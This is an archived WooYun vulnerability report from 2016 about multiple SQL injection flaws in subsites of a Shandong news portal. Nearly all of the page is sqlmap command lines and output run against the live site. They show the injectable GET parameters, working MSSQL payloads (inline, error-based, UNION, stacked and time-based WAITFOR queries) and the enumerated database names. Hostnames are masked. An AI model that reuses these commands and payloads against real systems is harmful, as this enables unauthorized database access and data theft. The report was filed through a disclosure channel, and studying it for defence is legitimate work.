中国山东网分站存在多处sql注入打包 | wooyun-2016-0166647| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166647

漏洞标题：中国山东网分站存在多处sql注入打包

漏洞作者：路人甲

提交时间：2016-01-02 10:10

修复时间：2016-02-20 15:48

公开时间：2016-02-20 15:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-02：细节已通知厂商并且等待厂商处理中
2016-01-08：厂商已经确认，细节仅向厂商公开
2016-01-18：细节向核心白帽子及相关领域专家公开
2016-01-28：细节向普通白帽子公开
2016-02-07：细节向实习白帽子公开
2016-02-20：细节向公众公开

简要描述：

详细说明：

元旦没妹子只好在家挖妹子汗~~
提交六发案例其余自测...
http://**.**.**.**/list.aspx?stid=5882
http://**.**.**.**/special/2013/sbjszqh/list.aspx?stid=5446&pageid=2
http://**.**.**.**/List.aspx?stid=5781
http://**.**.**.**/quxian/List.aspx?AreaInfoID=119
http://**.**.**.**/pinggu/result.aspx?id=1051 --tables -D 91haofang
http://**.**.**.**/list.aspx?stid=6041

案例6.
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:04:07
[14:04:07] [INFO] testing connection to the target URL
[14:04:07] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[14:04:08] [INFO] testing if the target URL is stable
[14:04:08] [INFO] target URL is stable
[14:04:08] [INFO] testing if GET parameter 'stid' is dynamic
[14:04:09] [INFO] confirming that GET parameter 'stid' is dynamic
[14:04:09] [INFO] GET parameter 'stid' is dynamic
[14:04:09] [WARNING] heuristic (basic) test shows that GET parameter 'stid' migh
t not be injectable
[14:04:09] [INFO] testing for SQL injection on GET parameter 'stid'
[14:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:04:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[14:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[14:04:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:04:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:04:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[14:04:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:04:12] [INFO] testing 'MySQL inline queries'
[14:04:12] [INFO] testing 'PostgreSQL inline queries'
[14:04:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:04:12] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL S
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[14:04:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:04:13] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) re
quests:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:04:24] [INFO] testing Microsoft SQL Server
[14:04:25] [INFO] confirming Microsoft SQL Server
[14:04:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:04:25] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 14 times
[14:04:25] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:04:25
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041 --
current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:04:32
[14:04:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:04:32] [INFO] testing connection to the target URL
[14:04:32] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:04:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:04:33] [INFO] fetching current database
current database:       None
[14:04:33] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:04:33
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041 --
dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:04:40
[14:04:40] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:04:40] [INFO] testing connection to the target URL
[14:04:40] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:04:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:04:41] [INFO] fetching database names
[14:04:41] [WARNING] the SQL query provided does not return any output
[14:04:41] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:04:41] [INFO] retrieved: SDSW20_News
[14:04:42] [INFO] retrieved: master
[14:04:42] [INFO] retrieved: tempdb
[14:04:42] [INFO] retrieved: model
[14:04:42] [INFO] retrieved: msdb
[14:04:42] [INFO] retrieved: ReportServer
[14:04:42] [INFO] retrieved: ReportServerTempDB
[14:04:42] [INFO] retrieved: SDSW20_News
[14:04:43] [INFO] retrieved: Man_adv
[14:04:43] [INFO] retrieved: SDSW20_Main
[14:04:43] [INFO] retrieved: WebFiles
[14:04:43] [INFO] retrieved: NewsAPP
[14:04:43] [INFO] retrieved: 91haofang
[14:04:43] [INFO] retrieved:
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:04:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 14 times
[14:04:43] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:04:43
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=6041 --
current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:08:44
[14:08:44] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:08:44] [INFO] testing connection to the target URL
[14:08:44] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113)+(SELE
CT (CASE WHEN (3618=3618) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+
CHAR(107)+CHAR(98)+CHAR(113))
---
[14:08:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:08:45] [INFO] fetching current database
current database:       None
[14:08:45] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:08:45
C:\Python27\sqlmap>
案列5.
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/pinggu/result.aspx?id=1
051 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:06:14
[14:06:14] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:06:14] [INFO] testing connection to the target URL
[14:06:14] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1051 AND 3295=3295
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1051 AND 4567=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+
CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4567=4567) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1051;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1051 WAITFOR DELAY '0:0:5'
---
[14:06:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:06:15] [INFO] fetching database names
[14:06:18] [WARNING] the SQL query provided does not return any output
[14:06:18] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:06:18] [INFO] fetching number of databases
[14:06:19] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[14:06:19] [INFO] retrieved:
[14:06:19] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..........................
[14:06:22] [CRITICAL] considerable lagging has been detected in connection respo
nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or
 more)
[14:06:22] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[14:06:22] [ERROR] unable to retrieve the number of databases
[14:06:22] [INFO] retrieved: 91haofang
[14:06:22] [INFO] retrieved: master
[14:06:22] [INFO] retrieved: tempdb
[14:06:22] [INFO] retrieved: model
[14:06:22] [INFO] retrieved: msdb
[14:06:22] [INFO] retrieved: ReportServer
[14:06:22] [INFO] retrieved: ReportServerTempDB
[14:06:23] [INFO] retrieved: SDSW20_Main
[14:06:23] [INFO] retrieved: SDSW20_HR
[14:06:23] [INFO] retrieved: jiaju
[14:06:23] [INFO] retrieved: cms_newair
[14:06:23] [INFO] retrieved: SD_QIYE
[14:06:23] [INFO] retrieved: SDSW20_Video
[14:06:23] [INFO] retrieved: yycar
[14:06:23] [INFO] retrieved: SDSW20_Digg
[14:06:23] [INFO] retrieved: SDSW20_Rank
[14:06:24] [INFO] retrieved: SDSW20_Ask
[14:06:24] [INFO] retrieved: adv_new
[14:06:24] [INFO] retrieved: SDSW20_Other
[14:06:24] [INFO] retrieved: 91haofang
[14:06:24] [INFO] retrieved: SDSW20_Ads
[14:06:24] [INFO] retrieved: SDSW20_Video_old
[14:06:24] [INFO] retrieved: bbs
[14:06:24] [INFO] retrieved:
available databases [22]:
[*] 91haofang
[*] adv_new
[*] bbs
[*] cms_newair
[*] jiaju
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SD_QIYE
[*] SDSW20_Ads
[*] SDSW20_Ask
[*] SDSW20_Digg
[*] SDSW20_HR
[*] SDSW20_Main
[*] SDSW20_Other
[*] SDSW20_Rank
[*] SDSW20_Video
[*] SDSW20_Video_old
[*] tempdb
[*] yycar
[14:06:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 24 times
[14:06:24] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:06:24
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/pinggu/result.aspx?id=1
051 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:57
[14:09:57] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:57] [INFO] testing connection to the target URL
[14:09:57] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1051 AND 3295=3295
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1051 AND 4567=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+
CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4567=4567) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1051;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1051 WAITFOR DELAY '0:0:5'
---
[14:09:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:09:58] [INFO] fetching current database
[14:09:58] [INFO] retrieved: 91haofang
current database:    '91haofang'
[14:09:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[14:09:58] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:58
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/pinggu/result.aspx?id=1
案例4. 
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/quxian/List.aspx?AreaI
nfoID=119
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:07:03
[14:07:03] [INFO] testing connection to the target URL
[14:07:03] [WARNING] reflective value(s) found and filtering out
[14:07:03] [INFO] testing if the target URL is stable
[14:07:04] [INFO] target URL is stable
[14:07:04] [INFO] testing if GET parameter 'AreaInfoID' is dynamic
[14:07:04] [INFO] confirming that GET parameter 'AreaInfoID' is dynamic
[14:07:05] [WARNING] GET parameter 'AreaInfoID' does not appear dynamic
[14:07:05] [WARNING] heuristic (basic) test shows that GET parameter 'AreaInfoID
' might not be injectable
[14:07:05] [INFO] heuristic (XSS) test shows that GET parameter 'AreaInfoID' mig
ht be vulnerable to XSS attacks
[14:07:05] [INFO] testing for SQL injection on GET parameter 'AreaInfoID'
[14:07:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:07:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[14:07:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[14:07:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:07:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:07:11] [INFO] GET parameter 'AreaInfoID' is 'Microsoft SQL Server/Sybase AND
 error-based - WHERE or HAVING clause' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL S
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[14:07:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:07:12] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[14:07:17] [INFO] target URL appears to be UNION injectable with 1 columns
[14:07:18] [INFO] GET parameter 'AreaInfoID' is 'Generic UNION query (NULL) - 1
to 20 columns' injectable
GET parameter 'AreaInfoID' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) re
quests:
---
Parameter: AreaInfoID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaInfoID=119) AND 9428=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CH
AR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9428=9428) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8109=8109
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: AreaInfoID=119) UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR
(112)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(117)+CHAR(100)+CHAR(86)+CHAR(85)+CHAR(90)
+CHAR(118)+CHAR(88)+CHAR(104)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)-
-
---
[14:07:19] [INFO] testing Microsoft SQL Server
[14:07:20] [INFO] confirming Microsoft SQL Server
[14:07:21] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:07:21] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[14:07:21] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:07:21
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/quxian/List.aspx?AreaI
nfoID=119 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:07:24
[14:07:24] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:07:25] [INFO] testing connection to the target URL
[14:07:25] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AreaInfoID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaInfoID=119) AND 9428=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CH
AR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9428=9428) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8109=8109
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: AreaInfoID=119) UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR
(112)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(117)+CHAR(100)+CHAR(86)+CHAR(85)+CHAR(90)
+CHAR(118)+CHAR(88)+CHAR(104)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)-
-
---
[14:07:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:07:25] [INFO] fetching database names
[14:07:25] [INFO] the SQL query used returns 12 entries
[14:07:26] [INFO] retrieved: 91haofang
[14:07:26] [INFO] retrieved: Man_adv
[14:07:27] [INFO] retrieved: master
[14:07:27] [INFO] retrieved: model
[14:07:27] [INFO] retrieved: msdb
[14:07:28] [INFO] retrieved: NewsAPP
[14:07:28] [INFO] retrieved: ReportServer
[14:07:29] [INFO] retrieved: ReportServerTempDB
[14:07:29] [INFO] retrieved: SDSW20_Main
[14:07:30] [INFO] retrieved: SDSW20_News
[14:07:30] [INFO] retrieved: tempdb
[14:07:30] [INFO] retrieved: WebFiles
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:07:31] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:07:31
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/quxian/List.aspx?AreaI
nfoID=119 --current-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:26
[14:09:27] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:27] [INFO] testing connection to the target URL
[14:09:28] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: AreaInfoID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: AreaInfoID=119) AND 9428=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CH
AR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9428=9428) THEN CHAR(49) ELSE CH
AR(48) END))+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113))) AND (8109=8109
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: AreaInfoID=119) UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR
(112)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(117)+CHAR(100)+CHAR(86)+CHAR(85)+CHAR(90)
+CHAR(118)+CHAR(88)+CHAR(104)+CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)-
-
---
[14:09:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:09:28] [INFO] fetching current database
current database:    'SDSW20_News'
[14:09:28] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:28
C:\Python27\sqlmap>
案例3.
C:\Python27\sqlmap>Sqlmap.py -u http://**.**.**.**/List.aspx?stid=5781
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:17:05
[14:17:06] [INFO] testing connection to the target URL
[14:17:06] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[14:17:07] [INFO] testing if the target URL is stable
[14:17:07] [INFO] target URL is stable
[14:17:07] [INFO] testing if GET parameter 'stid' is dynamic
[14:17:08] [INFO] confirming that GET parameter 'stid' is dynamic
[14:17:08] [WARNING] GET parameter 'stid' does not appear dynamic
[14:17:08] [WARNING] heuristic (basic) test shows that GET parameter 'stid' migh
t not be injectable
[14:17:08] [INFO] testing for SQL injection on GET parameter 'stid'
[14:17:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:17:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[14:17:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[14:17:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:17:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:17:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[14:17:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[14:17:10] [INFO] testing 'MySQL inline queries'
[14:17:10] [INFO] testing 'PostgreSQL inline queries'
[14:17:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:17:10] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for '['Microsoft SQL S
erver', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[14:17:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:17:12] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[14:17:12] [WARNING] reflective value(s) found and filtering out
[14:17:13] [WARNING] parameter length constrainting mechanism detected (e.g. Suh
osin patch). Potential problems in enumeration phase can be expected
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) re
quests:
---
Parameter: stid (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(113)+(SEL
ECT (CASE WHEN (9289=9289) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(107)+CHAR(112)+CHAR(113))
---
[14:17:15] [INFO] testing Microsoft SQL Server
[14:17:16] [INFO] confirming Microsoft SQL Server
[14:17:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
